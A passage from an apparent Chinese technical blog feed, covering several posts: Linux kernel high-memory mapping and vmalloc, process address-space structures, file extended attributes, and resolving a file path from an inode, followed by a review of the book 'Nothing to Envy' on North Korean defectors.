<td style="text-align: left">高于16MB但地狱896MB的内存页框</td>
</tr>
<tr>
<td style="text-align: left">ZONE_HIGHMEM</td>
<td style="text-align: left">高于896MB的内存页框</td>
</tr>
</tbody>
</table>
<p>x86下的Linux使用一致访问内存(UMA)模型,因此Linux中只有一个单独的节点,包含了系统中所有的物理内存。</p>
<h3>三. 高端内存页框的映射</h3>
<p>为了使内核访问到高于896M的物理内存,必须将高端内存的页框映射到内核地址空间,Linux使用永久内核映射、临时内核映射以及非连续内存分配。</p>
<h4>永久内核映射</h4>
<p>永久内核映射允许内核建立高端页框到内核地址空间的长期映射,它们使用主内核页表中一个专门的页表,其地址存放在pkmap_page_table变量中。页表中的表项数由LAST_PKMAP宏产生。页表包含512或1024项,这取决于PAE机制是否被激活。因此,内核最多一次性访问2M或4M的高端内存。页表映射的线性地址从PKMAP_BASE开始,pkmap_count数组包含LAST_PKMAP个计数器,pkmap_page_table页表中的每一个项都有一个。计数器可能为0、1或大于1。</p>
<ul>
<li>
<p>如果计数器为0,则说明对应的页表项没有映射任何高端内存,所以是可用的。</p>
</li>
<li>
<p>如果计数器为1,则说明对应的页表项没有映射任何高端内存,但是不能被使用,因为自从它最后一次使用以来,其TLB表项还未被刷新。</p>
</li>
<li>
<p>如果计数器大于1,则说明映射一个高端内存页框,这意味着正好有n-1个内核成分在使用这个页框。</p>
</li>
</ul>
<p>为了记录高端内存页框与永久内核映射包含的线性地址之间的联系,内核使用page_address_htable做散列表,它使用page_address_map数据结构用于为高端内存中的每一个页框进行映射。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct page_address_map {
struct page *page;
void *virtual;
struct list_head list;
};
</code></pre></div></div>
<p>page_address()函数返回页框对应的线性地址,如果页框在高端内存中并且没有被映射,则返回NULL。如果页框不在高端内存中,就通过lowmem_page_address返回线性地址。如果在高端内存中,则通过函数page_slot在page_address_htable中查找,如果在散列表中查找到,就返回线性地址。</p>
<p>kmap()用来建立内存区映射,代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void *kmap(struct page *page){
might_sleep();
if (!PageHighMem(page))
return page_address(page);
return kmap_high(page);
};
</code></pre></div></div>
<p>本质上如果是高端内存区域,则使用kmap_high()函数用来建立高端内存区的永久内核映射,代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void *kmap_high(struct page *page)
{
unsigned long vaddr;
/*
* For highmem pages, we can't trust "virtual" until
* after we have the lock.
*/
lock_kmap();
vaddr = (unsigned long)page_address(page);
if (!vaddr)
vaddr = map_new_virtual(page);
pkmap_count[PKMAP_NR(vaddr)]++;
BUG_ON(pkmap_count[PKMAP_NR(vaddr)] < 2);
unlock_kmap();
return (void*) vaddr;
};
</code></pre></div></div>
<h4>临时内存映射</h4>
<p>说到临时内存映射就要说到固定映射的线性地址,就是第一张图的最后一部分。固定映射的线性地址(fix-mapped linear address)基本上是一种类似于0xffffc000这样的常量线性地址,其对应的物理地址不必等于线性地址减去0xc0000000,而是可以以任意方式建立。因此,每个固定映射的线性地址都映射一个物理内存的页框。</p>
<p>高端内存的任意一页框都可以通过一个“窗口”(为此而保留的一个页表项)映射到内核地址空间。每个CPU都有它自己包含的13个窗口集合,它们用enum km_type数据结构表示。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>enum km_type {
KMAP_D(0) KM_BOUNCE_READ,
KMAP_D(1) KM_SKB_SUNRPC_DATA,
KMAP_D(2) KM_SKB_DATA_SOFTIRQ,
KMAP_D(3) KM_USER0,
KMAP_D(4) KM_USER1,
KMAP_D(5) KM_BIO_SRC_IRQ,
KMAP_D(6) KM_BIO_DST_IRQ,
KMAP_D(7) KM_PTE0,
KMAP_D(8) KM_PTE1,
KMAP_D(9) KM_IRQ0,
KMAP_D(10) KM_IRQ1,
KMAP_D(11) KM_SOFTIRQ0,
KMAP_D(12) KM_SOFTIRQ1,
KMAP_D(13) KM_SYNC_ICACHE,
KMAP_D(14) KM_SYNC_DCACHE,
KMAP_D(15) KM_UML_USERCOPY,
KMAP_D(16) KM_IRQ_PTE,
KMAP_D(17) KM_NMI,
KMAP_D(18) KM_NMI_PTE,
KMAP_D(19) KM_TYPE_NR
};
</code></pre></div></div>
<p>km_type中的每个符号(除了最后一个)都是固定映射的线性地址的一个下标。为了建立临时内核映射,内核调用kmap_atomic()函数。在后来的内核代码中,kmap_atomic()函数只是使用了kmap_atomic_prot。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void *kmap_atomic_prot(struct page *page, enum km_type type)
{
unsigned int idx;
unsigned long vaddr;
void *kmap;
pagefault_disable();
if (!PageHighMem(page))
return page_address(page);
debug_kmap_atomic(type);
kmap = kmap_high_get(page);
if (kmap)
return kmap;
idx = type + KM_TYPE_NR * smp_processor_id();
vaddr = __fix_to_virt(FIX_KMAP_BEGIN + idx);
#ifdef CONFIG_DEBUG_HIGHMEM
BUG_ON(!pte_none(*(TOP_PTE(vaddr))));
#endif
set_pte_ext(TOP_PTE(vaddr), mk_pte(page, kmap_prot), 0);
local_flush_tlb_kernel_page(vaddr);
return (void *)vaddr;
}
</code></pre></div></div>
<h4>非连续内存分配</h4>
<p>如果内核能够找到连续的页,那是最好的,这样分配和释放都会比较简单,但是真实的系统里情况往往不是那么简单。在分配一大块内存时,可能竭尽全力也无法找到连续的内存块,在用户空间中这不是问题,因为普通进程设计为使用处理器的分页机制,当然这也会降低速度并占用TLB。</p>
<p>为非连续内存区保留的线性地址空间从VMALLOC_START到VMALLOC_END。</p>
<p>每个vmalloc分配的子区域都是自包含的,与其他vmalloc子区域通过一个内存页分隔,类似于直接映射和vmalloc区域之间的边界,不同vmalloc子区域之间的分隔也是为防止不正确的内存访问操作。这种情况只会因为内核故障出现,应该通过系统错误信息报告,而不是允许内核其他部分的数据被暗中修改,因为分隔是在虚拟地址空间中建立的,不会浪费物理内存页。</p>
<p>vmalloc是一个接口函数,内核代码使用它来分配在虚拟内存中连续但在物理内存中不一定连续的内存。
这个函数只需要一个参数,用于指定所需内存区的长度,不过其长度单位不是页而是字节,这在用户空间程序的设计中是很普遍的。</p>
<p>使用vmalloc的最著名的实例是内核对模块的实现,因为模块可以在任何时候加载,如果模块数据比较多,那么无法保证有足够的连续内存可用,特别是在系统已经运行了比较长时间的情况下。如果能够用小块内存拼接出足够的内存,那么就可以使用vmalloc。</p>
<p>因为用于vmalloc的内存页总是必须映射在内核地址空间中,因此使用ZONE_HIGHMEM内存域的页要优于其他内存域,这使得内核可以节省更宝贵的较地段内存域又不会带来额外的坏处。所以,vmalloc是内核出于自身的目的使用高端内存页的少数情况之一。</p>
<p>内核在管理虚拟内存中的vmalloc区域时,必须跟踪哪些子区域被使用,哪些是空闲的,所以定义了一个vm_struct的数据结构,并将所有使用的部分保存在一个链表中。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct vm_struct {
struct vm_struct *next;
void *addr;
unsigned long size;
unsigned long flags;
struct page **pages;
unsigned int nr_pages;
unsigned long phys_addr;
void *caller;
}; 内核通过vmalloc()来申请非连续的物理内存,若申请成功,该函数返回连续内存区的起始地址,否则,返回NULL。vmalloc()和kmalloc()申请的内存有所不同,kmalloc()所申请内存的线性地址与物理地址都是连续的,而vmalloc()所申请的内存线性地址连续而物理地址则是离散的,两个地址之间通过内核页表进行映射。
</code></pre></div></div>
<p>vmalloc()的工作方式理解起来很简单:
1.寻找一个新的连续线性地址空间;
2.依次分配一组非连续的页框;
3.为线性地址空间和非连续页框建立映射关系,即修改内核页表;</p>
Linux进程地址空间简介2014-10-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/10/10/linux-process-vm
<h3>一. 进程的地址空间</h3>
<p>32位系统下,每一个进程可以使用的虚拟地址空间为4G,这4G包括了进程独有的和内核,windows下进程占2G,内核占2G,Linux下默认是3G和1G。有4G的地址空间,当然不可能全部用到,所有实际上只有很少一部分是分配了实际内存的。进程的地址空间由允许进程使用的全部线性地址组成。</p>
<p>内核通过所谓线性区的资源来表示线性地址空间,线性区是由其实线性地址、长度和一些访问权限来描述的。为了效率起见,起始地址和线性区长度都必须是4096的倍数,以便每个线性区所识别的数据完全填满分配给它的页框。内核可以通过增加或删除某些线性地址区间来动态修改进程的地址空间。</p>
<h3>二. 内存描述符</h3>
<p>与进程地址空间有关的全部信息都包含在一个叫做内存描述符的数据结构中,这个结构的类型为mm_struct,进程描述符的mm字段就指向这个结构。mm_struct定义如下。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct mm_struct {
struct vm_area_struct * mmap; /* list of VMAs */
struct rb_root mm_rb;
struct vm_area_struct * mmap_cache; /* last find_vma result */
unsigned long free_area_cache; /* first hole */
pgd_t * pgd;
atomic_t mm_users; /* How many users with user space? */
atomic_t mm_count; /* How many references to "struct mm_struct" (users count as 1) */
int map_count; /* number of VMAs */
struct rw_semaphore mmap_sem;
spinlock_t page_table_lock; /* Protects task page tables and mm->rss */
struct list_head mmlist; /* List of all active mm's. These are globally strung
* together off init_mm.mmlist, and are protected
* by mmlist_lock
*/
unsigned long start_code, end_code, start_data, end_data;
unsigned long start_brk, brk, start_stack;
unsigned long arg_start, arg_end, env_start, env_end;
unsigned long rss, total_vm, locked_vm;
unsigned long def_flags;
unsigned long saved_auxv[40]; /* for /proc/PID/auxv */
unsigned dumpable:1;
cpumask_t cpu_vm_mask;
/* Architecture-specific MM context */
mm_context_t context;
/* coredumping support */
int core_waiters;
struct completion *core_startup_done, core_done;
/* aio bits */
rwlock_t ioctx_list_lock;
struct kioctx *ioctx_list;
struct kioctx default_kioctx;
};
</code></pre></div></div>
<p>下面介绍一些比较重要的字段。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>* mmap 指向线性区对象的链表头,具体下一部分介绍。
* mm_rb指向线性区对象的红-黑树的根。mmap 和 mm_rb 这两个不同数据结构体描述的对象是相同的:该地址空间中的所有内存区域。mmap 指向一个 vm_area_struct 结构的链表,利于简单、高效地遍历所有元素。 mm_rb 指向的是一个红-黑树结构节点,适合搜索指定元素。
* pgd 指向第一级页表即页全局目录的基址,当内核运行这个进程时,它就将pgd存放在CR3寄存器内,根据它来进行地址转换工作。
* mmlist 将所有的内存描述符存放在一个双向链表中,第一个元素是init_mm的mmlist字段。
* mm_users 存放共享mm_struct数据结构的轻量级进程的个数。
* mm_count mm_count字段是内存描述符的主使用计数器,在mm_users次使用计数器中的所有用户在mm_count中只作为一个单元。每当mm_count递减时,内核都要检查它是否变为0,如果是,就要解除这个内存描述符,因为不再有用户使用它。
</code></pre></div></div>
<p>mm_count 代表了对 mm 本身的引用,而 mm_users 代表对 mm 相关资源的引用,分了两个层次。mm_count类似于 以进程为单位。 mm_users类似于以线程为单位。内核线程在运行时会借用其他进程的mm_struct,这样的线程叫”anonymous users”, 因为他们不关心mm_struct指向的用户空间,也不会去访问这个用户空间,他们只是临时借用,m_count记录这样的线程。 mm_users是对mm_struct所指向的用户空间进行共享的所有进程的计数,也就是说会有多个进程共享同一个用户空间。</p>
<h3>三. 线性区</h3>
<p>Linux通过类型为vm_area_struct的对象对线性区进行管理,其定义如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct vm_area_struct {
struct mm_struct * vm_mm; /* The address space we belong to. */
unsigned long vm_start; /* Our start address within vm_mm. */
unsigned long vm_end; /* The first byte after our end address within vm_mm. */
/* linked list of VM areas per task, sorted by address */
struct vm_area_struct *vm_next;
pgprot_t vm_page_prot; /* Access permissions of this VMA. */
unsigned long vm_flags; /* Flags, listed below. */
struct rb_node vm_rb;
union {
struct {
struct list_head list;
void *parent; /* aligns with prio_tree_node parent */
struct vm_area_struct *head;
} vm_set;
struct raw_prio_tree_node prio_tree_node;
} shared;
struct list_head anon_vma_node; /* Serialized by anon_vma->lock */
struct anon_vma *anon_vma; /* Serialized by page_table_lock */
/* Function pointers to deal with this struct. */
struct vm_operations_struct * vm_ops;
/* Information about our backing store: */
unsigned long vm_pgoff; /* Offset (within vm_file) in PAGE_SIZE
units, *not* PAGE_CACHE_SIZE */
struct file * vm_file; /* File we map to (can be NULL). */
void * vm_private_data; /* was vm_pte (shared mem) */
unsigned long vm_truncate_count;/* truncate_count or restart_addr */
};
</code></pre></div></div>
<p>每一个线性区描述符表示一个线性地址区间。vm_start字段包含区间的第一个线性地址,vm_end字段包含区间之外的第一个线性地址。vm_end-vm_start表示线性区的长度。vm_mm字段指向拥有这个区间的进程的mm_struct内存描述符。</p>
<p>进程所拥有的线性区从来不重叠,并且内核尽力把新分配的线性区与紧邻的现有线性区进行合并。如果两个相邻区的访问权限相匹配,就能把它们合并在一起。如下图所示,当一个新的线性地址加入到进程的地址空间时,内核检查一个已经存在的线性区是否可以扩大(情况a)。如果不能,就创建一个新的线性区(情况b)。类似地,如果从进程地址空间删除一个线性地址空间,内核就要调整受影响的线性区大小(情况c)。有些情况下,调整大小迫使一个线性区被分成两个更小的部分(情况d)。</p>
<p><img src="/assets/img/process_vm/1.jpg" alt="" /></p>
<p>进程所拥有的所有线性区是通过一个简单的链表链接在一起的。出现在链表中的线性区是按内存地址的升序排列的;不过,每个线性区可以由未使用的内存地址区隔开。每个vm_area_struct元素的vm_next字段指向链表的下一个元素。内核通过检查描述符mmap字段来查找线性区,其中mmap字符指向链表中的第一个线性区描述符。下图显示了进程的地址空间、它的内存描述符以及线性区链表三者之间的关系。</p>
<p><img src="/assets/img/process_vm/2.PNG" alt="" /></p>
<p>为了提高访问线性区的性能,Linux也使用了红-黑树。这两种数据结构包含指向同一线性区描述符的指针,当插入或删除一个线性区描述符时,内核通过红-黑树搜索前后元素,并用搜索结果快速更新链表而不用扫描链表。一般来说,红-黑树用来确定含有指定地址的线性区,而链表通常在扫描整个线性区集合时来使用。</p>
<p>下面随便看看一个进程的线性区。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct task_struct *t = pid_task(find_get_pid(2576),PIDTYPE_PID);
struct mm_struct * mm = t->mm;
struct vm_area_struct* vma = mm->mmap;
int i;
for(i = 0;i < mm->map_count;++i)
{
printk("0x%x-----0x%x\n",vma->vm_start,vma->vm_end);
vma = vma->vm_next;
}
</code></pre></div></div>
<p>通过dmesg看结果如下图。</p>
<p><img src="/assets/img/process_vm/4.PNG" alt="" /></p>
<p>这与通过cat /proc/2576/maps命令看的是一致,只有栈部分有少许差别。</p>
<p><img src="/assets/img/process_vm/3.PNG" alt="" /></p>
Linux文件扩展属性以及从内核中获得文件扩展属性2014-10-09T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/10/09/linux-extend-attr
<p>扩展属性(EA)就是以名称-值对形式将任意元数据与文件i节点关联起来的技术。EA可以用于实现访问列表和文件能力,还可以利用EA去记录文件的版本号、与文件的MIME类型/字符集有关的信息等,反正想干嘛就干嘛吧。</p>
<p>EA的命名格式为namespace.name。其中namespace用来把EA从功能上划分为截然不同的几大类,而name则用来在既定命名空间内唯一标示某个EA。</p>
<p>Linux定义了4中namespace:user、trusted、system和security。</p>
<ul>
<li>user EA:在文件权限检查的制约下由非特权级进程操控。</li>
<li>trusted EA:也可由用户进程“驱使”,与user EA相似。区别在于,要操纵trusted EA,进程必须具有特权(CAP_SYS_ADMIN)。</li>
<li>system EA:供内核使用,将系统对象与一文件关联。目前仅支持访问控制列表。</li>
<li>
<p>security EA:作用有二:其一,用来存储服务于操作系统安全模块的文件安全标签;其二,将可执行文件与能力关联起来。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kvm@ubuntu:~$ touch filetest
kvm@ubuntu:~$ setfattr -n user.x -v "The past is not dead." filetest
kvm@ubuntu:~$ setfattr -n user.y -v "In fact,it's not even past." filetest
kvm@ubuntu:~$ getfattr -n user.x filetest
# file: filetest
user.x="The past is not dead."
kvm@ubuntu:~$ getfattr -d filetest
# file: filetest
user.x="The past is not dead."
user.y="In fact,it's not even past."
kvm@ubuntu:~$ setfattr -n user.x filetest //设置EA的值为一个空字符串
kvm@ubuntu:~$ getfattr -d filetest
# file: filetest
user.x
user.y="In fact,it's not even past."
kvm@ubuntu:~$ setfattr -x user.y filetest //删除一个EA
kvm@ubuntu:~$ getfattr -d filetest
# file: filetest
user.x
</code></pre></div> </div>
</li>
</ul>
<p>应用层的函数就不说了,下面简单介绍一下在内核层中获取文件的EA。一小段测试代码如下,主要是通过inode结构中操作getxattr来得到,当然之前需要得到dentry。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int hello_init()
{
struct file *f;
struct inode *node;
struct dentry *dent;
int rc;
char in[100];
printk(KERN_ALERT "Hello, world\n");
printk(KERN_ALERT "name:%s\n",current->comm);
f = filp_open("/home/kvm/tfile",O_RDONLY,0);
dent = f->f_path.dentry;
node = dent->d_inode;
if (node->i_op->getxattr == NULL)
{
printk("inode's getxattr is null!\n");
return 0;
}
rc = node->i_op->getxattr(dent, "user.x", in, 100);
if (rc < 0)
return 0;
printk("the user.x is:%s\n",in);
return 0;
}
</code></pre></div></div>
<p>输出为:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>the user.x is:The past is not dead.
</code></pre></div></div>
Linux内核中从inode结构得到文件路径名2014-08-31T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/08/31/get-the-full-pathname-from-inode
<p>最近的一个需求,从文件的inode得到全路径名。顺便总结一下Linux系统中的file,path,dentry,inode结构。</p>
<ul>
<li><a href="#第一节">概述</a></li>
<li><a href="#第二节">各个结构</a></li>
<li><a href="#第三节">从inode得到文件绝对路径</a></li>
</ul>
<h3 id="第一节">1.概述</h3>
<p>构成一个操作系统最重要的部分就是进程管理和文件系统了。</p>
<p>Linux最初采用的是minix的文件系统,minix是由Andrew S. Tanenbaum开发的用于实验性的操作系统,比如有一些局限性。后来经过一段时间的改进和发展,Linux开发出了ext2文件系统,当然后来逐渐发展除了ext3、ext4。为了使Linux支持各种不同的文件系统,Linux使用了所谓的虚拟文件系统VFS(Virtual Filesystem Switch),VFS提供一组标准的、抽象的文件操作,以系统调用的形式提供给用户程序,如read(),write(),lseek()等。这样,用户程序就可以把所有的文件都看作一致的、抽象的”VFS文件”,通过这些系统调用对文件进行操作,而无需关心具体的文件属于什么文件系统以及具体文件系统的设计和实现。VFS与具体文件系统的关系如图1所示。</p>
<p><img src="/assets/img/inode/1.PNG" alt="" /></p>
<h3 id="第二节">2.各个结构</h3>
<p>不同的文件系统通过不同的程序来实现其各种功能,但是与VFS之间的界面则是有明确的定义。这个界面的主体就是file_operations数据结构。定义在include/linux/fs.h中:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct file_operations {
struct module *owner;
loff_t (*llseek) (struct file *, loff_t, int);
ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
ssize_t (*aio_read) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
ssize_t (*aio_write) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
int (*readdir) (struct file *, void *, filldir_t);
unsigned int (*poll) (struct file *, struct poll_table_struct *);
long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long);
long (*compat_ioctl) (struct file *, unsigned int, unsigned long);
int (*mmap) (struct file *, struct vm_area_struct *);
int (*open) (struct inode *, struct file *);
int (*flush) (struct file *, fl_owner_t id);
int (*release) (struct inode *, struct file *);
int (*fsync) (struct file *, loff_t, loff_t, int datasync);
int (*aio_fsync) (struct kiocb *, int datasync);
int (*fasync) (int, struct file *, int);
int (*lock) (struct file *, int, struct file_lock *);
ssize_t (*sendpage) (struct file *, struct page *, int, size_t, loff_t *, int);
unsigned long (*get_unmapped_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long);
int (*check_flags)(int);
int (*flock) (struct file *, int, struct file_lock *);
ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);
ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);
int (*setlease)(struct file *, long, struct file_lock **);
long (*fallocate)(struct file *file, int mode, loff_t offset,
loff_t len);
};
</code></pre></div></div>
<p>每个文件系统都有自己的file_operations结构,结构中的成分几乎全是函数指针,所以实际上是个函数跳转表,例如read就指向具体文件系统用来实现读文件操作的入口函数。</p>
<p>每个进程通过open()与具体的文件建立起连接,这种连接以一个file数据结构作为代表,结构中有个file_operations结构指针f_op。将file结构中的指针f_op设置成指向某个具体的file_operations结构,就指定了这个文件所属的文件系统。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct files_struct {
/*
* read mostly part
*/
atomic_t count;
struct fdtable __rcu *fdt;
struct fdtable fdtab;
/*
* written part on a separate cache line in SMP
*/
spinlock_t file_lock ____cacheline_aligned_in_smp;
int next_fd;
struct embedded_fd_set close_on_exec_init;
struct embedded_fd_set open_fds_init;
struct file __rcu * fd_array[NR_OPEN_DEFAULT];
};
</code></pre></div></div>
<p>进程的task_struct中有一个类型为struct files_struct的files域,记录了具体已打开的文件信息。files_struct的主体就是一个file结构数组。每打开一个文件以后,进程就通过一个“打开文件号”fid来访问这个文件,而fid实际上就是相应file结构在数组中的下标。file结构中海油一个指针f_dentry,指向该文件的dentry数据结构。每一个文件只有一个dentry结构,而可能有多个进程打开它。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct dentry {
/* RCU lookup touched fields */
unsigned int d_flags; /* protected by d_lock */
seqcount_t d_seq; /* per dentry seqlock */
struct hlist_bl_node d_hash; /* lookup hash list */
struct dentry *d_parent; /* parent directory */
struct qstr d_name;
struct inode *d_inode; /* Where the name belongs to - NULL is
* negative */
unsigned char d_iname[DNAME_INLINE_LEN]; /* small names */
/* Ref lookup also touches following */
unsigned int d_count; /* protected by d_lock */
spinlock_t d_lock; /* per dentry lock */
const struct dentry_operations *d_op;
struct super_block *d_sb; /* The root of the dentry tree */
unsigned long d_time; /* used by d_revalidate */
void *d_fsdata; /* fs-specific data */
struct list_head d_lru; /* LRU list */
/*
* d_child and d_rcu can share memory
*/
union {
struct list_head d_child; /* child of parent list */
struct rcu_head d_rcu;
} d_u;
struct list_head d_subdirs; /* our children */
struct list_head d_alias; /* inode alias list */
};
</code></pre></div></div>
<p>dentry结构中有一个指向inode的指针。dentry与inode结构所描述的目标是不一样的,因为一个文件可能对应多个文件名(链接)。所以dentry结构代表的是逻辑意义上的文件,记录的是其逻辑上的属性。而inode结构所代表的是物理意义上的文件,记录的是其物理上的属性;它们之间的关系是多对一的关系。这是因为一个已经建立的文件可以被连接 (link) 到其他文件名。dentry中还有个d_parent指向父目录的dentry结构。</p>
<p>inode数据结构比较大,就不列出来了。要注意的是inode结构中有一个i_dentry是所有与这个inode关联的dentry。凡是代表着这个文件的所有目录项都通过其dentry结构中的d_alias挂入相应inode结构中的 i_dentry 队列。</p>
<p>下面是需要注意的几点:</p>
<ol>
<li>进程每打开一个文件,就会有一个file结构与之对应。同一个进程可以多次打开同一个文件而得到多个不同的file结构,file结构描述被打开文件的属性,如文件的当前偏移量等信息。</li>
<li>两个不同的file结构可以对应同一个dentry结构。进程多次打开同一个文件时,对应的只有一个dentry结构。dentry结构存储目录项和对应文件(inode)的信息。</li>
<li>在存储介质中,每个文件对应唯一的inode结点,但是每个文件又可以有多个文件名。即可以通过不同的文件名访问同一个文件。这里多个文件名对应一个文件的关系在数据结构中表示就是dentry和inode的关系。</li>
<li>inode中不存储文件的名字,它只存储节点号;而dentry则保存有名字和与其对应的节点号,所以就可以通过不同的dentry访问同一个inode。</li>
<li>不同的dentry则是同个文件链接(ln命令)来实现的。</li>
</ol>
<p>因此关系就是:进程->task_struct->files_struct->file->dentry->inode->Data Area</p>
<h3 id="第三节">3.从inode得到文件绝对路径</h3>
<p>有了上面的基础,从inode得到文件名就比较简单了,这里我假设文件只有一个路径,如果有很多路径改改就行了。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>char *getfullpath(struct inode *inod,char* buffer,int len)
{
struct list_head* plist = NULL;
struct dentry* tmp = NULL;
struct dentry* dent = NULL;
struct dentry* parent = NULL;
char* name = NULL;
char* pbuf = buffer + PATH_MAX - 1;
struct inode* pinode = inod;
int length = 0;
buffer[PATH_MAX - 1] = '\0';
if(pinode == NULL)
return NULL;
list_for_each(plist,&pinode->i_dentry)
{
tmp = list_entry(plist,struct dentry,d_alias);
if(tmp->d_inode == pinode)
{
dent = tmp;
break;
}
}
if(dent == NULL)
{
return NULL;
}
name = (char*)(dent->d_name.name);
name = name + strlen(name) - 4;
if(!strcmp(name,".img"))
{
while(pinode && pinode ->i_ino != 2 && pinode->i_ino != 1)
{
if(dent == NULL)
break;
name = (char*)(dent->d_name.name);
if(!name)
break;
pbuf = pbuf - strlen(name) - 1;
*pbuf = '/';
memcpy(pbuf+1,name,strlen(name));
length += strlen(name) + 1;
if((parent = dent->d_parent))
{
dent = parent;
pinode = dent->d_inode;
}
}
printk(KERN_INFO "the fullname is :%s \n",pbuf);
}
return pbuf;
}
</code></pre></div></div>
我们最幸福2014-08-10T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/08/10/nothing-to-envy
<p>“总是使一个国家变成人间地狱的东西,恰恰是人们试图将其变成天堂。”这句话因为在哈耶克的名著《通往奴役之路》被引用而成为人们对极权社会最好的总结。如果说《一九八四》从理论上描述了极权社会的存在,《我们最幸福》则是实实在在让人们看到了这样一个社会的存在与运作。</p>
<p>一直以来,对于北韩的印象基本上都是来自两个方面,正经的CCTV式的新闻与鱼龙混杂的网络。前者大部分是核问题或者偶尔出来放个炮挑衅一把,而后者则还包括了对三胖的恶搞。新闻报道与各种道听途说,北韩给我的印象基本就是“贫穷”“落后””自以为是“”不自量力“等等。直到读完《我们最幸福》,才真正的从一些普通人的生活中看到了极权世界对于人们的影响,才有几次的泪流满面与不忍卒读。上一次读得这么虐心的时候还是在读《古拉格:一部历史》的时候。</p>
<p>如果看一下远东地区夜间的卫星图片,就会发现在中国、日本和南韩都闪烁着代表繁荣的亮光,显示着人们作为二十一世纪的能源消费者在各自忙碌着。而这之间却有着一个近乎英格兰大小的黑暗地带,这片处于黑暗的地区就是朝鲜民主主义人民共和国的所在,简称北韩。无论是从宏观还是微观角度看,北韩都显得如此神秘。宏观上讲,北韩这个最后的共产主义试验地,坚强的撑过了柏林墙倒塌,东欧剧变,苏联解体,中国的市场化改革,金日成去世,90年代的饥荒,两届小布什总统任期,阿拉伯之春后依然顽固存在了下来,早在上个世纪90年代就被认为北韩的覆灭是板上钉钉的事却顺利传到了第三代领导人金正恩的手中,这个顽强的独裁政权无疑是政治学者们需要研究的对象。从微观上讲,北韩普通人的生活对于外界而言更是一片空白,外国记者基本上不可能有机会访问北韩普通人,就像它的社会主义老大哥苏联当年对待访问者一样,所有的采访都是都过安排进行的,所有的参观地点都是经过精挑细选的。</p>
<p>于是,我们只能通过脱北者(从北韩逃亡南韩或者中国的人)的描述,去了解北韩人的生活,藉此也可以增加我们宏观上对北韩的了解。芭芭拉·的德米克作为《洛杉矶时报》的特派记者,2001年被派往首尔,负责两韩的新闻报道。在南韩,她通过长达7年对大量脱北者的访谈,着重选取记录了6位脱北者的经历进行类似小说式的穿插叙述,将各个脱北者的生活与经历揉在一起,向我们展示了一副朝鲜民主主义人民共和国普通百姓真实生活的画卷。书名叫做《我们最幸福》(英文名Nothing to Envy),来自北韩著名的童谣,那首歌里唱着”我们的父亲,在这个世界上,我们最幸福“。</p>
<p>6位脱北者分别是:朝鲜战争期间打到北韩的南韩士兵的女儿,美兰,因为”不洁之血“,后来好不容易成为了一个幼儿园教师;因为被北韩宣传手法所迷惑而回到北韩的日本朝侨的儿子,俊相,由于血统较好,后来去了平壤的一个科技大学读书,前途光明;早年不折不扣的共产主义信仰者宋女士;宋女士叛逆的女儿玉熙;尽心尽力的医生,金女士,父亲为了逃离中国灾难式的大跃进来到了北韩; 无家可归、火车站的流浪孤儿金赫。他们出身各异,经历各异,最终都经过各种艰辛脱离北韩到了南韩。</p>
<p>这里我只能简介一下美兰和俊相之间的凄美北韩爱情故事。美兰十二岁那年与大她三岁的俊相相识,他们花了三年时间才牵手,又花了另外六年才接吻。由于身份悬殊的关系,他们的爱情一直都在地下,即使是家都在清津每一次的见面却要找各种借口,偷偷摸摸。后来俊相去了平壤的所谓北韩的麻省理工上大学,在父母看来有着美好的前途——找到一份好工作,加入劳动党。美兰尽管出身不好,但是通过自己的努力出乎意料的被清津最好的师范学院录取。尽管他们之间只能通过最简单的书信进行交流,时间与空间也没有能吞噬这段纯美的爱情。他们的爱情非常曲折,有的时候寄的信根本没有办法收到,因为邮差把信件烧掉用来取暖。林肯说过:“最高明的骗子,可能在某个时刻欺骗所有的人,也可能所有的时刻欺骗某些人,但不可能在所有的时刻欺骗所有的人。”即使是在北韩如此洗脑的教育下,也不可能所有人都永远蒙在鼓里,因为事实就在眼前。美兰不可能眼睁睁看看孩子们挨饿却告诉他们是被祝福才身为北韩人的。美兰父亲的去世遗嘱就是让美兰一家去寻找南韩的亲人。而身为高级知识分子的俊相更是早就有了脱北的心。他深思熟虑,计划周详,悄悄听着南韩的广播,为了逃脱攒了三年的钱。美兰先于俊相脱离了苦海。虽然历经曲折,最终俊相也通过蒙古边境警察进入了南韩大使馆。</p>
